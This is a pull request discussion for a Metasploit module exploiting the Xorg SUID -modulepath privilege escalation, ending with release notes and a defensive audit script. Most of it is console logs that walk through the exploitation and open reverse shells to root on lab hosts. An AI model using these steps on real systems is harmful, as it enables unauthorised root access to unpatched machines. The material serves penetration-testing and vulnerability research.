WIP Xorg x11 suid server modulepath #11025

Merged
merged 6 commits into from Oct 22, 2019

Conversation

@aringo
Contributor

aringo commented Nov 26, 2018

Using this version of the exploit there is no need to overwrite crontab; it works against SELinux and is near instant. I had some difficulties getting this to work on OpenBSD. Should I try to update the other one to use this method for Linux? Kind of burnt out on this exploit now, so WIP 💯

  • Start msfconsole
  • get session
  • exploit/multi/local/xorg_x11_suid_server_modulepath
Module options (exploit/multi/local/xorg_x11_suid_server_modulepath):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.30.0.2       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x64


msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.30.0.2:4444 
[*] Running additional check for Linux
[+] Console lock for peep
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.5 is vulnerable
[+] Xorg does not appear running
[+] gcc is installed
[+] Passed all initial checks for exploit
[*] Writing launcher
[*] Max line length is 65537
[*] Writing 145 bytes in 1 chunks of 524 bytes (octal-encoded), using printf
[*] compiling launcher
[*] Uploading your payload, this could take a while
[*] Max line length is 65537
[*] Writing 249 bytes in 1 chunks of 728 bytes (octal-encoded), using printf
[*] Exploiting
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (816260 bytes) to 172.30.0.61
[*] Meterpreter session 2 opened (172.30.0.2:4444 -> 172.30.0.61:55866) at 2018-11-25 19:31:39 -0600
[+] Deleted /tmp/CmduZk.c
[+] Deleted /tmp/libglx.so
[+] Deleted /tmp/.session-k0KBlQ1xT

meterpreter > shell 
Process 2299 created.
Channel 1 created.
id ; uname -a ; sestatus
uid=0(root) gid=0(root) groups=0(root),1000(peep) context=unconfined_u:unconfined_r:xserver_t:s0-s0:c0.c1023
Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Fri Apr 20 16:44:24 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
SELinux status:                 enabled
SELinuxfs mount:                /sys/fs/selinux
SELinux root directory:         /etc/selinux
Loaded policy name:             targeted
Current mode:                   enforcing
Mode from config file:          error (Inappropriate ioctl for device)
Policy MLS status:              enabled
Policy deny_unknown status:     allowed
Max kernel policy version:      31
@bcoles

Contributor

bcoles commented Nov 26, 2018


# linux checks
uname = cmd_exec "uname"
if uname =~ /linux/i

@bcoles

bcoles Nov 26, 2018

Contributor

This isn't necessary if you're only targeting Linux.

@aringo

aringo Nov 27, 2018

Author Contributor

This technique works on Solaris also, I'll open it up. It does not work on OpenBSD though.

xdisplay = datastore['Xdisplay']
sofile = "#{modulepath}/#{datastore['sofile']}"

stub = %Q^

@bcoles

bcoles Nov 26, 2018

Contributor

For Linux, you could use Metasm to dynamically compile the shared object, rather than relying on gcc to be on the box. Here's an example.

@bcoles

Contributor

bcoles commented Apr 21, 2019

Any luck with adding support for Solaris? There are a few examples of dealing with Solaris' insane $PATH issues for gcc and compiling a shared object in the exploits/solaris/local directory. Alternatively, I can take a look at implementing gcc for Solaris if you like.

Perhaps it would be better to get this landed and circle back later.

Should I try to update the other one to use this method for Linux?

I think it makes sense to keep the two vectors separate. Partly because they're exploited differently, but mostly because the module logic is already complex enough as a multi module.

@space-r7 space-r7 self-assigned this Oct 15, 2019
@space-r7

Contributor

space-r7 commented Oct 21, 2019

Hi @aringo! Do you mind if I try adding a Solaris target to your module? Thanks!

space-r7 added 3 commits Oct 21, 2019
@space-r7

Contributor

space-r7 commented Oct 22, 2019

In the interest of getting this landed soon, I added support for Metasm, Solaris targets, and documentation.

@space-r7 space-r7 added docs and removed needs-docs labels Oct 22, 2019
@space-r7

Contributor

space-r7 commented Oct 22, 2019

Testing on Centos 7.4:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] Sending stage (816260 bytes) to 172.16.215.159
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.159:33178) at 2019-10-22 13:48:01 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath 
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check
[+]  The target is vulnerable.
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] Passed all initial checks for exploit
[*] Writing launcher and compiling
[*] Uploading your payload, this could take a while
[*] Exploiting
[*] Sending stage (816260 bytes) to 172.16.215.159
[*] Meterpreter session 2 opened (172.16.215.1:4444 -> 172.16.215.159:33180) at 2019-10-22 13:48:51 -0500
[+] Deleted /tmp/libglx.so
[+] Deleted /tmp/.session-qwQLbME

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Testing on Solaris 11.4:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_ksh
payload => cmd/unix/reverse_ksh
msf5 exploit(multi/handler) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] Command shell session 1 opened (172.16.215.1:4444 -> 172.16.215.159:33616) at 2019-10-22 14:06:33 -0500
[*] Command shell session 2 opened (172.16.215.1:4444 -> 172.16.215.152:39838) at 2019-10-22 14:06:33 -0500

whoami
space
id 
uid=100(space) gid=10(staff)
uname -a
SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc
background

Background session 2? [y/N]  y
msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath 
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set target 2
target => 2
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 2
session => 2
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload cmd/unix/reverse_ksh
payload => cmd/unix/reverse_ksh
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check

[!] SESSION may not be compatible with this module.
[+]  The target is vulnerable.
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] Passed all initial checks for exploit
[*] Writing launcher and compiling
[*] Uploading your payload, this could take a while
[*] Exploiting
[*] Command shell session 3 opened (172.16.215.1:4444 -> 172.16.215.152:45033) at 2019-10-22 14:07:37 -0500
[+] Deleted /tmp/DhNrDYvoir.c
[+] Deleted /tmp/libglx.so
[+] Deleted /tmp/.session-ZnrESw

id
uid=0(root) gid=0(root)
uname -a
SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc
space-r7 added a commit that referenced this pull request Oct 22, 2019
@space-r7 space-r7 merged commit 1ceaa1d into rapid7:master Oct 22, 2019
3 checks passed
Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed
msjenkins-r7 added a commit that referenced this pull request Oct 22, 2019
@space-r7

Contributor

space-r7 commented Oct 22, 2019

Release Notes

This exploits a local privilege escalation vulnerability on targets running Xorg server versions from v1.19.0 to versions below v1.20.3. Vulnerable versions of Xorg have the SUID bit set and allow low-privileged users to start the server with the -modulepath flag. This allows a user to load and execute a shared object as root.
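As an added example (not the module's code and not from this PR), a host-side audit that applies the release-note criteria from the defender's side: a root-owned SUID Xorg binary whose version falls in v1.19.0 up to but not including v1.20.3. The `Xorg -version` banner format ("X.Org X Server 1.19.5") is an assumption; /usr/bin/Xorg is the path seen in the module output above.

```python
# Added example, not part of the module or this PR: audit a host against the
# release-note criteria (root-owned SUID Xorg, version v1.19.0 <= v < v1.20.3).
# Assumed: `Xorg -version` prints a banner such as "X.Org X Server 1.19.5".
import os
import re
import stat
import subprocess

VULN_FROM = (1, 19, 0)  # first vulnerable release named in the release notes
FIXED_IN = (1, 20, 3)   # release notes: versions below v1.20.3 are vulnerable


def parse_xorg_version(banner):
    """Pull the server version out of `Xorg -version` output, padded to 3 parts."""
    m = re.search(r"X\.Org X Server (\d+(?:\.\d+)*)", banner)
    if not m:
        return None
    parts = [int(p) for p in m.group(1).split(".")]
    parts += [0] * (3 - len(parts))          # "1.20" -> (1, 20, 0)
    return tuple(parts[:3])


def is_vulnerable_version(version):
    """Tuple comparison orders 1.19.5 before 1.20.0 (a string compare would not)."""
    return VULN_FROM <= version < FIXED_IN


def is_suid_root(st_mode, st_uid):
    """-modulepath only yields root when the binary is root-owned with the SUID bit set."""
    return bool(st_mode & stat.S_ISUID) and st_uid == 0


def audit(xorg_path="/usr/bin/Xorg"):
    """Collect the same facts the module's checks rely on, for remediation tracking."""
    result = {"path": xorg_path, "present": os.path.exists(xorg_path)}
    if not result["present"]:
        return result
    st = os.stat(xorg_path)
    result["suid_root"] = is_suid_root(st.st_mode, st.st_uid)
    proc = subprocess.run([xorg_path, "-version"], capture_output=True, text=True)
    version = parse_xorg_version(proc.stdout + proc.stderr)  # banner may go to stderr
    result["version"] = version
    result["vulnerable"] = bool(version and result["suid_root"]
                                and is_vulnerable_version(version))
    return result


if __name__ == "__main__":
    report = audit()
    print(report)
    if report.get("vulnerable"):
        print(f"Update to 1.20.3 or later, or clear the SUID bit: chmod u-s {report['path']}")
```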

@bcoles bcoles added rn-modules and removed delayed labels Oct 24, 2019